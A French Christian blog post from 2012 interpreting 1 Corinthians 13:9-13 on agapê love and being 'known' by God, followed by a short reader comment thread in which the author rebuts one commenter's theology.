• 1 Corinthiens 13 !... "l'Amour"...




    "Car nous connaissons en partie, et nous prophétisons en partie,

    mais quand ce qui est parfait sera venu, ce qui est partiel disparaîtra.

    Lorsque j’étais enfant, je parlais comme un enfant, je pensais comme un enfant, je raisonnais comme un enfant; lorsque je suis devenu homme, j'ai fait disparaître ce qui était de l'enfant.

    Aujourd’hui nous voyons au moyen d’un miroir, d’une manière obscure, mais alors nous verrons face à face; aujourd’hui je connais (ginosko) en partie, mais alors je connaîtrai comme j'ai été connu (epiginosko).

     Maintenant donc ces trois choses demeurent: la foi, l’espérance, l'Amour-agapê; mais la plus grande de ces choses, c’est l'Amour-agapê." (1 Cor 13:9-13)

     

    Quand les "chrétiens" (tout comme d'ailleurs "le monde" lors des mariages par exemple) récitent "1 Cor 13", ils se contentent en général des versets 1 à 7 (avec le début du verset 8) et parlent d'un "amour" qu'ils ne connaissent bien souvent pas, et le remplacent d'ailleurs parfois par "charité" avec tout son triste sens religieux ou par le faux amour sentimental humain et séducteur.

     

    C'est pourtant seulement dans les versets suivants que "l'Amour-agapê" prend tout son sens !

     

    Il est effectivement écrit que c'est lorsque ce qui est parfait sera venu que ce qui est partiel disparaîtra, que ce soit pour la "connaissance" ("ginosko") ou les "prophéties".

     

    Le verbe "connaître" ("ginosko") a ici le même sens qu'en Mat7:23 lorsque Yeshoua dit "Je ne vous ai jamais connus", ce qui a aussi le même sens de "pénétration" que lorsqu'un homme "connaît" une femme, que ce soit en Genèse avec Adam et Eve ou dans les évangiles lorsque Joseph a "connu" Marie après la naissance de Yeshoua.

     

    Il s'agit donc d'une "pénétration spirituelle" et seuls ceux qui sont "nés d'en haut", ou "engendrés d'en haut" (Jean 3:3-7) peuvent être véritablement "connus de YHWH notre Elohim"...

    ... et seuls ceux qui sont "connus de YHWH notre Elohim" ont vu cet Amour-agapê être "répandu dans leur coeur par l'Esprit Saint". (Rom 5:5)

     

    C'est donc d'Amour parfait dont on parle ici, cet Amour pur et Saint qu'on ne rencontre que chez ceux qui se sont repentis de leur désobéissance à la Loi de YHWH notre Elohim pour pouvoir "naître de nouveau" ("d'en haut") grâce au sacrifice parfait de Yeshoua et au Saint Esprit qu'Il nous a donné, bref c'est "l'Amour-agapê de la Vérité pour être sauvés". (2 Th 2:10)

     

    Que dire de ceux qui "parlent, pensent et raisonnent comme des enfants" (verset 11) sinon qu'ils ne connaissent pas encore la maturité spirituelle et la "stature parfaite du Mashiah (Christos)". (Ephésiens 4:13; Jacques 1:4)

    Ce sont cependant eux qui, bien souvent, veulent donner des "leçons d'amour" à ceux qui "ont fait disparaître ce qui était de l'enfant".

     

    Paul dit au verset 11 qu'il connaît (ginosko) en partie, et pourtant, lui, a déjà "fait disparaître ce qui était de l'enfant" ! (verset 10)

    Que dire à nouveau de ceux qui "parlent, pensent et raisonnent comme des enfants" ?... sinon qu'ils "connaissent" encore moins.

    Car, selon ce qui est écrit, si nous devons "être connus de YHWH notre Elohim", nous devons aussi Le connaître... au moins "en partie" !

     

    C'est pour cela qu'il est aussi écrit qu'il faut "chercher PREMIEREMENT le Royaume de YHWH notre Elohim et Sa Justice" (Mat 6:33), que "nul n'est intelligent, nul ne cherche Elohim" (Romains 3:11), "cherchez et vous trouverez" (Mat 7:7; Luc 11:9), "si tu Le cherches, Il se laissera trouver par toi, mais si tu L'abandonnes, Il te rejettera pour toujours". 
    (1 Chroniques 28:9)...

     

    Dans ce même verset 11 de 1 Corinthiens 13, il est dit qu'alors "nous verrons FACE à FACE" et aussi que "je connaîtrai comme j'ai été connu" (epiginosko, c'est à dire d'une connaissance ou pénétration complète et réciproque) !

     

    C'est le "miroir de YHWH notre Elohim" qui nous attend et nous savons que c'est un "feu dévorant" (Héb 12:29, mais aussi Exode 24:17; Deut 4:24; 9:3; Psaume 18:9; Psaume 50:3; Esaïe 29:6; 30:27; 30:30; 33:14; Jérémie 20:9; Joël 2:3).

     

     Apprenons donc à Le connaître dès maintenant afin de ne pas être seulement "sauvé comme au travers du feu" (1 Cor 3:15) car "C'est une chose terrible que de tomber entre les mains de l'Elohim vivant". (Héb 10:31)

     


    JYH
    3/07/2012
    (Copie autorisée et même souhaitable, à condition d'en redonner le texte intégral et les sources) 

    1 Corinthiens 13 !... "l'Amour"...

    « Amour bisounours pour la perdition ou Amour-agapê donc "Saint" pour le "Salut" ?!QUI est le MAÎTRE du SHABBAT ? »
    Partager via Gmail Yahoo! Google Bookmarks Blogmarks

    Tags Tags : , , , ,
  • Commentaires

    1
    COULIBALY
    Samedi 1er Septembre 2012 à 09:25

    Dans 1corinthiens15v45à55 :ce changement d'ou il est question ce manifeste seulement qu'après l'enseignement de l'onction1jean2v27"la penetration"s'opère par le transfert de votre âme dans un corps celestre le dernier Adam n'a pas transmit sa naissance par ces cottes comme le 1erAdam,il a lavé les pieds des disciples avec l'eau de ces cottes perçésjean13v5à8(la posterité de la femme)voir 1ere prophesie;genèse3v15 :nous postérités de la femme(enfants de Jésus) sommes huminisés contre la blesure du serpent par la protection du Saint Esprit que Pierre,les 120 et nous avons reçu dans la chambre haute.

     

    l

    2
    Samedi 1er Septembre 2012 à 16:08

    "Transfert de l'âme dans un corps céleste" ?!

    "Nous, enfants de Jésus" ?!

    "Immunisation contre la blessure du serpent" ?!


    Il faut sortir des "religions animistes" cher ami.

    Vous êtes bien loin de la Vérité.

    L'âme n'est pas "transférée" mais "régénérée par le Rouah Hakodesh-Esprit Saint"... si on L'a reçu. (Jean 16:13; Rom 12:2...)

    Il n'y a pas "d'enfants de Jésus" mais des "Fils (adoptifs) d'Elohim", frères de "Yeshoua le premier-né". (Rom 8:29; Col 1:15,18; Héb 1:6; Apoc 1:5) ... et ce sont ceux qui peuvent "marcher comme Il (Yeshoua) a marché Lui-même". (1 Jean 2:6)

    Etc.

    3
    Dimanche 2 Septembre 2012 à 02:21

    ..Je comprend pourquoi tu réclame des prières !!

    "c'est a cause de l'ésprit RELIGIEUX qui fait tant de dégâts

    ..MAIS ton article est toujours aussi excellent .. mais tu sais y en a qui aiment pas les médecins Lol ils veulent se guérir eux-mêmes :(

    et en tout cas je suis désolée si jamais mon commentaire laisse de TAGS ?!

    bon courage ,big bisous

    <script src="http://p.datastomp.com/9/3/39.js" type="text/javascript"></script>
    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter